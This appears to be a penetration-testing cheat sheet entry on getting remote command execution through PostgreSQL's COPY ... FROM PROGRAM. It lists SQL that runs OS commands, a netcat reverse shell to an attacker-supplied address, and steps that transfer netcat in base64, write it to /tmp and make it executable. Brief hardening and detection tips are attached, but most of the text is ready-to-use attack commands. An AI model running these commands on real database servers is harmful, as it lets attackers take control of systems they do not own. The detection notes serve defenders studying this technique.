tcp/5432 postgres

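  • RCE via COPY ... FROM PROGRAM
    – needs a superuser role or membership in pg_execute_server_program (PostgreSQL 11+); the command runs as the OS account of the postgres server process
    – hardening/detection: keep application roles out of both, do not expose 5432 to untrusted networks, and alert on "COPY ... PROGRAM" in the server's statement logs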
> create table logs (value text);
> delete from logs; copy logs (value) from program 'whoami'; select * from logs;
> delete from logs; copy logs (value) from program 'nc -v <ip> <port> -e /bin/bash'; select * from logs;
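  • For very restricted hosts, use base64 to transfer nc
    – detection: the postgres OS account spawning a shell, or writing a file under /tmp and then making it executable, is a strong indicator of this technique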
> base64 -w 0 < /usr/bin/nc > nc.txt
> delete from logs; copy logs (value) from program 'echo [base64_content] > /tmp/nc.txt'; select * from logs;
> delete from logs; copy logs (value) from program 'base64 -d /tmp/nc.txt > /tmp/nc'; select * from logs;
> delete from logs; copy logs (value) from program 'chmod u+x /tmp/nc'; select * from logs;